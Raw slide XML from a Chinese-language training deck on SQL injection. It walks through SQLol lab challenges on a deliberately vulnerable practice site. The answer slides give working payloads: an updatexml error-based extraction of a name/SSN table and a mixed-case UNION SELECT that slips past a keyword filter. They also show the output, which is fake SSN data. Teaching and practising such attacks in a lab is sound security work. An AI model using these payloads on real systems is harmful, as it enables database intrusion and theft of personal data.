              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无返回语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704382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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）类似</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0,concat(0x01,(SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,' ',</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> limit 0,1)),0) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>XPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>syntax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>error: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Slobdegoob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> 000-00-1112' </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1624344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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge8.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>union,select,where,and,or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,--,#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>全部返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查询语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="724308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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FCFCFC"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FCFCFC">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3598148" y="548680"/>
            <a:ext cx="5093072" cy="3405082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1819151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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用大小写混合</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uNion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>seLect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,':',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uNion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>selEct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> null from users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>whEre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; Chunk MacRunfast:666-67-6776 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Derper:012-34-5678 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; Peter Weiner:111-22-3333 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> LovedeFace:999-99-9999 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Slobdegoob:000-00-1112 ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1522270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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge9.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
